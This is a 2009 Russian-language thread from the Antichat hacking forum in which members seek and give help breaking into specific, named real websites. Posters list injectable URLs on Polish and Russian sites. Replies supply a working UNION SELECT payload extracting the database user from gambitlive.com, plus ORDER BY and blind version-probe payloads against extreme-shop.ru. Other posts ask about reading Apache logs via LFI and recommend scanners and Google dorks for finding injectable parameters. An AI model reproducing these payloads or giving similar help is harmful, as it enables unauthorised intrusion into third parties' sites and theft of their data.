16.06.2009, 07:49
|
|
Members of Antichat - Level 5
Регистрация: 23.08.2007
Сообщений: 417
С нами:
9851426
Репутация:
3908
|
|
Сообщение от YuNi|[c
нет vailbrush ты сильно ошибаешся, я уже где то подробное описание видел на английском которое выполняли на xss ке тоесть внутри xss sql запросы, но к сожалению забыл где нашел. Вот поэтому спросил может здесь в ачате уже знают.
ты не прав, XSS выполняется у тебя в браузере, а sql запросы идут к базе данных. Можно внутри sql инъекции заюзать xss, но не наоборот.
__________________
Feci, quod potui. Faciant meliora potentes.
|
|
|
16.06.2009, 11:17
|
|
Познающий
Регистрация: 16.05.2009
Сообщений: 42
С нами:
8941129
Репутация:
7
|
|
Сообщение от mailbrush
http://forum.antichat.ru/thread49775.html
Архивчик битый в этой теме, перезалейте плиз.
|
|
|
|
16.06.2009, 00:41
|
|
Познающий
Регистрация: 16.05.2009
Сообщений: 42
С нами:
8941129
Репутация:
7
|
|
Кто чем ищет логи (конфиги итд....) апача при LFI?
|
|
|
|
16.06.2009, 08:10
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
а понял значит я перепутал, спасибо
|
|
|
|
16.06.2009, 10:22
|
|
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
С нами:
9410786
Репутация:
2731
|
|
Код:
http://www.mieszkania.inter-bud.pl/m-os.php?id=115
PostgreSQL. Статью читал, но ни ордер баем ни юнион селектом не подобрал. Прошу помощи 
Код:
http://www.gambitlive.com/night.php?id=90
MySQL 5 (по блинду узнал), но юниона не читает. Можно сделать вывод там?
Последний раз редактировалось mailbrush; 16.06.2009 в 10:30..
|
|
|
|
16.06.2009, 11:31
|
|
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
С нами:
10339586
Репутация:
1396
|
|
Сообщение от mailbrush
Код:
http://www.mieszkania.inter-bud.pl/m-os.php?id=115
PostgreSQL. Статью читал, но ни ордер баем ни юнион селектом не подобрал. Прошу помощи
Код:
http://www.gambitlive.com/night.php?id=90
MySQL 5 (по блинду узнал), но юниона не читает. Можно сделать вывод там?
можно, вот:
http://www.gambitlive.com/index.php?page=gallery&&albumid=409+union+select+1 ,user(),3,4,5,6,7,8+limit+1,1--
|
|
|
|
16.06.2009, 11:15
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
Подскажие пожалуйста сканеры ТОЛЬКО SQL-inj , которые сканировали бы, например, сайт на параметарезированные ссылки. (Что-то типа запроса к гуглу: site: moy_Sayt.ru inurl:"ID=")
SIPT,NetDeviLz SQL Scanner не катят))
|
|
|
|
16.06.2009, 23:40
|
|
Участник форума
Регистрация: 17.09.2006
Сообщений: 248
С нами:
10340793
Репутация:
66
|
|
Сообщение от jecka3000
Подскажие пожалуйста сканеры ТОЛЬКО SQL-inj , которые сканировали бы, например, сайт на параметарезированные ссылки. (Что-то типа запроса к гуглу: site: moy_Sayt.ru inurl:"ID=")
SIPT,NetDeviLz SQL Scanner не катят))
Acunetix Web Vulnerability Scanner 6.x, Core Impact 7.5
Мошнее я не видел еще
|
|
|
|
16.06.2009, 14:39
|
|
Постоянный
Регистрация: 15.03.2008
Сообщений: 441
С нами:
9555536
Репутация:
95
|
|
никак не могу подобрать столбцы, хотя на лицо, что это обычная MySQL inj
http://www.extreme-shop.ru/ru/catalogue/detail.shtml?CATALOGUE_ID=3&PRODUCT_ID=619
подскажите плиз))
|
|
|
|
16.06.2009, 14:47
|
|
Постоянный
Регистрация: 29.01.2009
Сообщений: 333
С нами:
9095366
Репутация:
298
|
|
http://www.extreme-shop.ru/ru/catalogue/detail.shtml?CATALOGUE_ID=3&PRODUCT_ID=619+order+b y+4/*
4-ый мускул
http://www.extreme-shop.ru/ru/catalogue/detail.shtml?CATALOGUE_ID=3&PRODUCT_ID=619+and+sub string(version(),1,1)=4
p.s. раскручивайте её как слепую, имхо.
Последний раз редактировалось AlexSatter; 16.06.2009 в 15:04..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
